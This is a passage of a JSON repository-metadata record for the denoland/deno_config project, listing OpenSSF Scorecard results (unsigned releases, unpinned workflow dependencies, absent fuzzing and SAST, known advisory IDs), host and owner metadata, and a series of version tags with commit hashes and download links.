v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"0.56.0","sha":"30af3ef3a5c5a808c210da1eba54009878c0030c","kind":"commit","published_at":"2025-06-09T15:28:16.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.56.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.56.0/manifests"},{"name":"0.55.0","sha":"70f925b23ebc2c785e3981754bc2f04214fb2df3","kind":"commit","published_at":"2025-05-28T15:24:34.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.55.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.55.0/manifests"},{"name":"0.54.2","sha":"ce54b1e53da266f49129142b9a48431506f9e33b","kind":"commit","published_at":"2025-04-29T19:46:38.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.54.2","html_url":"https://github.com/denoland/deno_config/releases/tag/0.54.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.54.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.54.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.54.2/manifests"},{"name":"0.54.1","sha":"1887e4d42ab5515f120be633bbeb9569b9e322bc","kind":"commit","published_at":"2025-04-29T15:27:52.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.54.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.54.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.54.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.54.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.54.1/manifests"},{"name":"0.54.0","sha":"0248eb25b9a494aa0304ee2ae891652be6dfaf34","kind":"commit","published_at":"2025-04-29T12:39:34.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.54.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.54.0/manifests"},{"name":"0.53.0","sha":"44a27e1ba41693db4b2780ed60be213bc3bc0d29","kind":"commit","published_at":"2025-04-17T09:10:34.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.53.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.53.0/manifests"},{"name":"0.52.0","sha":"f5263290f9896aa3e2032f9988a8df88015543e3","kind":"commit","published_at":"2025-04-04T17:28:10.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.52.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.52.0/manifests"},{"name":"0.51.0","sha":"d44bda07fdfe17c90ee583cc0db2cd7a4cf3db20","kind":"commit","published_at":"2025-03-20T17:36:15.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.51.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.51.0/manifests"},{"name":"0.50.0","sha":"4e87b6686cf4aa6ad5eacbe9d35a44933aa57e32","kind":"commit","published_at":"2025-02-24T15:59:15.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.50.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.50.0/manifests"},{"name":"0.49.1","sha":"432cae866c2ce057774eafec548a12467d92f6bf","kind":"commit","published_at":"2025-02-21T16:47:29.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.49.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.49.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.49.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.49.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.49.1/manifests"},{"name":"0.49.0","sha":"547173604386f081448322ebf0a7ed1aecc18384","kind":"commit","published_at":"2025-02-19T22:37:37.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.49.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.49.0/manifests"},{"name":"0.48.1","sha":"e1f3fd6d26fddb1df904f57dec1850e4577d287d","kind":"commit","published_at":"2025-02-14T10:23:34.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.48.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.48.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.48.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.48.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.48.1/manifests"},{"name":"0.48.0","sha":"8e25dd1a1febd0d11026f419b1d018b468204b92","kind":"commit","published_at":"2025-02-05T22:02:25.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.48.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.48.0/manifests"},{"name":"0.47.1","sha":"8f1401284c43d556a1466689f085863139179349","kind":"commit","published_at":"2025-01-28T22:42:46.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.47.1","html_url":"https://github.com/denoland/deno_config/releases/tag/0.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.47.1/manifests"},{"name":"0.47.0","sha":"5a8211a403861c4ba1756dae6a10509a9969ca21","kind":"commit","published_at":"2025-01-28T18:42:31.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.47.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.47.0/manifests"},{"name":"0.46.0","sha":"808c6c59e45fa11b023631b2f477db762f24755f","kind":"commit","published_at":"2025-01-27T22:19:37.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.46.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.46.0/manifests"},{"name":"0.45.0","sha":"e48aa992af9100e7550813a6c55b8b2b26caa2ab","kind":"commit","published_at":"2025-01-14T00:50:47.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.45.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.45.0/manifests"},{"name":"0.44.0","sha":"1b53dc86ca3644c1dcc09250ed71a91409bd8287","kind":"commit","published_at":"2025-01-09T12:56:15.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.44.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.44.0/manifests"},{"name":"0.43.0","sha":"00bac9653fdd351969d375ad1b668127b65631ee","kind":"commit","published_at":"2025-01-08T19:15:46.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.43.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.43.0/manifests"},{"name":"0.42.0","sha":"26aad8c316164bdd93dda0e58adaf86305884e42","kind":"commit","published_at":"2024-12-27T21:23:00.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.42.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.42.0/manifests"},{"name":"0.41.0","sha":"73e84c0f3d612f5c357c85bfe91aa55e9bd4bd04","kind":"commit","published_at":"2024-12-20T19:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.41.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.41.0/manifests"},{"name":"0.40.0","sha":"bf8ca4315b9f1f5de4aa1706f550ec6030048900","kind":"commit","published_at":"2024-12-02T16:18:03.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.40.0","html_url":"https://github.com/denoland/deno_config/releases/tag/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.40.0/manifests"},{"name":"0.39.3","sha":"3a7f7a19680f8c8ddc396c2f36a89bebded0dfbc","kind":"commit","published_at":"2024-11-26T00:04:33.000Z","download_url":"https://codeload.github.com/denoland/deno_config/tar.gz/0.39.3","html_url":"https://github.com/denoland/deno_config/releases/tag/0.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno_config@0.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno_config/tags/0.39.3","man